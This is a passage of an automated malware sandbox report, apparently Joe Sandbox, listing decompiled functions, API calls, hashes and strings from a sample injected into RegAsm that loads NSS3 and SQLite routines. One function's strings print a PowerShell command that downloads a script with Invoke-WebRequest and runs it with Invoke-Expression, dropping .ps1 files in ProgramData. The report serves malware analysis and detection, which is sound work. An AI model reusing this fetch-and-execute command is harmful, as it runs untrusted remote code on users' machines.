                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C95781D,?,6C94BE2C,?), ref: 6C956C58
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C6F
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C956C84
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C956C96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: TlsGetValue.KERNEL32(00000040,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901267
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: EnterCriticalSection.KERNEL32(?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C90127C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901291
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: PR_Unlock.NSS3(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C9012A0
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C956CAA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                  • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                  • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                  • Opcode ID: 971addf34ca16c23afbb2e3dafe98d33b9a143ff98c47f60492a7a145521759c
                                                                                                                                                                                                                                                                  • Instruction ID: 3fc62b613371a6087854da790368cad341e942cbc8c82cc938d7bbf47b12c667
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 971addf34ca16c23afbb2e3dafe98d33b9a143ff98c47f60492a7a145521759c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D801A7E17023522FEB00277AAE49F26356CAF8115DF948431FF04E0A42EAA6D57581B5
                                                                                                                                                                                                                                                                  Function 00412DBD Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00412DC2
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00412DE3
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00412DF1
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00412E1D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00412E3B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00412E4F
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00412E62
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410F7E: GlobalAlloc.KERNEL32(00000000,00412EF0,00000000,00000000,?,00412EF0,?,?), ref: 00410F89
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000), ref: 00412EFC
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00412FCB
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062B5
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalAlloc.KERNEL32(00000040,LY@,?,?,0040594C,00000000,?,?), ref: 004062C3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062D9
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalFree.KERNEL32(00000000,?,?,0040594C,00000000,?,?), ref: 004062E8
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00412F71
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426566,?,?,?,?,000003E8), ref: 00412F8E
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00412FA7
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004268E0), ref: 00412FB5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 174962345-0
                                                                                                                                                                                                                                                                  • Opcode ID: 373ced2fd5e81fd1b32ca1499eb274f2651f60a3878f506b19caf89aa058075e
                                                                                                                                                                                                                                                                  • Instruction ID: dd392c1b4b23fb95975a97ee58aadc884c7b7f48fd52fcc772572ec3cbda5285
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 373ced2fd5e81fd1b32ca1499eb274f2651f60a3878f506b19caf89aa058075e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D6120B2C00119AFCF10EBE0DC46EEEBBBDAF19304F14446AF505F3151E6399A998B65
                                                                                                                                                                                                                                                                  Function 6C90ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 786543732-0
                                                                                                                                                                                                                                                                  • Opcode ID: c74e68b15c75774cd0b1e0045603b920277c0de57049bd8fff9177d53b77cd8f
                                                                                                                                                                                                                                                                  • Instruction ID: 98819ec4f3477a383182b38f9d4a297b00db78380d134d2e9a9c754389587610
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74e68b15c75774cd0b1e0045603b920277c0de57049bd8fff9177d53b77cd8f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5251D375F002269BDF01DF68CC416BE77B8BB16349F148129D908A7B00DB34E946CBE6
                                                                                                                                                                                                                                                                  Function 00412811 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 310COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00412816
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                                  • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  • API String ID: 585178538-186952963
                                                                                                                                                                                                                                                                  • Opcode ID: 5478cef434ea2542eca72b198d4007862bbba3030476c516d24c8fe6090a4cf4
                                                                                                                                                                                                                                                                  • Instruction ID: 6c41075f7654ded0bc9d3484e90d781ddf5952724e82ed24846a13f32988d3be
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5478cef434ea2542eca72b198d4007862bbba3030476c516d24c8fe6090a4cf4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4D16A70900248EADB15EBE5D856BDEBBB8AF15308F1440BEA106735C2DA781B0CCB65
                                                                                                                                                                                                                                                                  Function 6C9E4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C9E4CAF
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9E4CFD
                                                                                                                                                                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C9E4D44
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                  • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                  • Opcode ID: 0fd46276a0103f8e667f7e66c152c70a54f73021fc5ff6a1a777a77cd1f9faf1
                                                                                                                                                                                                                                                                  • Instruction ID: 4585913df9e4db68cb5bded65cbe903f5dbf6678a1d9bc518d9af8b02119dce3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fd46276a0103f8e667f7e66c152c70a54f73021fc5ff6a1a777a77cd1f9faf1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32317AB2F04921A7D70B46A898007E4737ABFAE318F154139D4254BE15C725FCA28FE2
                                                                                                                                                                                                                                                                  Function 6C932C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(6C933F23,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C62
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C76
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C86
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C93
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932CC6
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932CDA
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23), ref: 6C932CEA
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?), ref: 6C932CF7
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?), ref: 6C932D4D
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C932D61
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(?,?), ref: 6C932D71
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C932D7E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2446853827-0
                                                                                                                                                                                                                                                                  • Opcode ID: d1cfa98df2323adfcff1928f538567be42dfa4fd4b88b412445b04481ac012b9
                                                                                                                                                                                                                                                                  • Instruction ID: 0b7c01744b268d10513facc57e7e92102d1f3b2c80b8cc4767d1944588669266
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1cfa98df2323adfcff1928f538567be42dfa4fd4b88b412445b04481ac012b9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C85115B6D00615ABDB01AF24DC458AA77B8FF2931CB048524ED1C97B12E731E965CBE1
                                                                                                                                                                                                                                                                  Function 6C927C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72120,Function_00097E60,00000000,?,?,?,?,6C9A067D,6C9A1C60,00000000), ref: 6C927C81
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C927CA0
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C927CB4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C927CCF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C927D04
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C927D1B
                                                                                                                                                                                                                                                                  • realloc.MOZGLUE(-00000050), ref: 6C927D82
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C927DF4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C927E0E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2305085145-0
                                                                                                                                                                                                                                                                  • Opcode ID: 21f8b1dd37a2d4e3e02f0ebf96fbd9e81fcce32f75fda40e1ee6085e6cae9d0a
                                                                                                                                                                                                                                                                  • Instruction ID: 851dd1f4eedf0b925fa550e44aaf1eda14ca52c6d523e174ea231d5506c210d5
